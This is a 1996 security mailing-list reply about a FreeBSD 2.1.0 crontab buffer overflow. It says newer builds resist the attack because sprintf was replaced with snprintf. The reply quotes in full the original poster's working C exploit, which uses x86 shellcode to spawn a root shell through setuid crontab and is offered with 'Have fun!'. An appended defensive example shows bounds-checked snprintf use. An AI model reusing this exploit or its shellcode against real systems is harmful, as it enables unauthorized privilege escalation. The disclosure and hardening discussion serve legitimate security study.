Date: Mon, 16 Dec 1996 15:58:42 -0600 (CST)
From: Karl Denninger <karl@Mcs.Net>
To: leshka@leshka.chuvashia.su
Cc: BUGTRAQ@NETSPACE.ORG, security@freebsd.org
Subject: Re: Exploit for crontab bug (FreeBSD 2.1.0).
Message-ID: <199612162158.PAA19217@Jupiter.Mcs.Net>
In-Reply-To: <199612142224.BAA00961@leshka.chuvashia.su> from "Leshka Zakharoff" at Dec 15, 96 01:24:02 am
(exploit elided)

This does not run on -CURRENT with crontab build dates after about mid-October.

A perusal of the source shows that the evil sprintf was replaced by snprintf, and that therefore the buffer overwrite should (and appears to in fact) fail.

--
--
Karl Denninger (karl@MCS.Net)| MCSNet - The Finest Internet Connectivity
http://www.mcs.net/~karl     | T1's from $600 monthly to FULL DS-3 Service
                             | 33 Analog Prefixes, 65 ISDN, Web servers $75/mo
Voice: [+1 312 803-MCS1 x219]| Email to "info@mcs.net" WWW: http://www.mcs.net/
Fax:   [+1 312 248-9865]     | 2 FULL DS-3 Internet links; 400Mbps B/W Internal

> /* ---------------------------- CUT HERE ----------------------------------- */
> /*                                                                          */
> /*  Hi !                                                                    */
> /*  This is a buffer overflow exploit for crontab bug (FreeBSD 2.1.0).      */
> /*  If you have any problems with it, drop me a letter.                     */
> /*  Have fun !                                                              */
> /*                                                                          */
> /*                                                                          */
> /*                        ----------------------                            */
> /*              ---------------------------------------------               */
> /*  ----------------- Dedicated to my beautiful lady ------------------     */
> /*              ---------------------------------------------               */
> /*                        ----------------------                            */
> /*                                                                          */
> /*                                         Leshka Zakharoff, 1996.          */
> /*                                         E-mail: leshka@leshka.chuvashia.su */
>
> #include <stdio.h>
> #include <string.h>   /* strstr, strncpy, strlen */
> #include <unistd.h>   /* execle */
>
> int main()
> {
> #define length 353
>   int i,j;
>   unsigned long start_addr;
>   char *env[]={NULL};
>   char param_string[length];
>   char code_string[]=
>   {
>     "\xeb\x2a"                        /* jmp cont */
>
> /* geteip: */
>     "\x5d"                            /* popl %ebp */
>     "\x55"                            /* pushl %ebp */
>     "\xfe\x4d\xe7"                    /* decb 0xffffffe7(%ebp) */
>     "\xfe\x4d\xeb"                    /* decb 0xffffffeb(%ebp) */
>     "\xfe\x4d\xec"                    /* decb 0xffffffec(%ebp) */
>     "\xfe\x4d\xed"                    /* decb 0xffffffed(%ebp) */
>     "\xff\x45\xef"                    /* incl 0xffffffef(%ebp) */
>     "\xfe\x4d\xf4"                    /* decb 0xfffffff4(%ebp) */
>     "\xc3"                            /* ret */
>
> /* 0xffffffe0(%ebp): */
>     "/bin/sh"
> /* 0xffffffe7(%ebp): */
>     "\x01"
>
> /* execve: */
>     "\x8d\x05\x3b\x01\x01\x01"        /* leal 0x3b,%eax */
>     "\x9a\xff\xff\xff\xff\x07\x01"    /* lcall 0x7,0x0 */
>
> /* cont: */
>     "\xc7\xc4XXXX"                    /* movl $0xXXXXXXXX,%esp */
>     "\xe8\xcb\xff\xff\xff"            /* call geteip */
>     "\x81\xc5\xef\xff\xff\xff"        /* addl $0xffffffef,%ebp */
>     "\x55"                            /* pushl %ebp */
>     "\x55"                            /* pushl %ebp */
>     "\x81\xc5\xf1\xff\xff\xff"        /* addl $0xfffffff1,%ebp */
>     "\x55"                            /* pushl %ebp */
>     "\xe8\xd4\xff\xff\xff"            /* call execve */
>   };
>
>   for(i=0;i<length-1;param_string[i++]='\x90');
>   param_string[length-1]='\0';
>   start_addr=0xefbfddf0;
>   *( (unsigned long*) strstr(code_string,"XXXX") )= start_addr;
>   strncpy(&param_string[200],code_string,strlen(code_string));
>   *( (unsigned long*) &param_string[348])= start_addr;
>
>   execle("/usr/bin/crontab","/usr/bin/crontab",param_string,NULL,env,NULL);
>
> }
> /* ---------------------------- CUT HERE ----------------------------------- */
>
>
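Added example (not cron's code and not either poster's): a hypothetical command-string builder showing the sprintf pattern Karl describes beside its snprintf replacement, plus the truncation check that a bare sprintf-to-snprintf swap does not give you. Buffer size, format string and function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define CMD_LEN 256   /* hypothetical fixed-size stack buffer */

/* Before the fix: sprintf cannot know how big cmd is, so a name longer than
 * the free space runs past the buffer onto the stack. Short input only here. */
int build_cmd_unsafe(char cmd[CMD_LEN], const char *editor, const char *file)
{
    return sprintf(cmd, "%s %s", editor, file);
}

/* After the fix: snprintf writes at most CMD_LEN bytes and returns the length
 * the full string would have had, so an oversized argument is rejected rather
 * than silently truncated. Returns 0 on success, -1 if it did not fit. */
int build_cmd_safe(char cmd[CMD_LEN], const char *editor, const char *file)
{
    int n = snprintf(cmd, CMD_LEN, "%s %s", editor, file);
    if (n < 0 || (size_t)n >= CMD_LEN) {
        cmd[0] = '\0';
        return -1;
    }
    return 0;
}

/* Audit helper: snprintf(NULL, 0, ...) measures; would the unsafe one overflow? */
int cmd_would_overflow(const char *editor, const char *file)
{
    int n = snprintf(NULL, 0, "%s %s", editor, file);
    return n < 0 || (size_t)n >= CMD_LEN;
}

/* Constructed argument of the length the quoted exploit passes (353 bytes
 * including the NUL). Returns 1 if the fixed builder rejects it. */
int rejects_exploit_length_arg(void)
{
    char cmd[CMD_LEN], arg[353];
    memset(arg, 'A', sizeof arg - 1);
    arg[sizeof arg - 1] = '\0';
    return cmd_would_overflow("/usr/bin/vi", arg) &&
           build_cmd_safe(cmd, "/usr/bin/vi", arg) == -1 && cmd[0] == '\0';
}

int main(void)
{
    char cmd[CMD_LEN];
    printf("short arg ok: %d\n", build_cmd_safe(cmd, "/usr/bin/vi", "/tmp/x"));
    printf("exploit-length arg rejected: %d\n", rejects_exploit_length_arg());
    return 0;
}
```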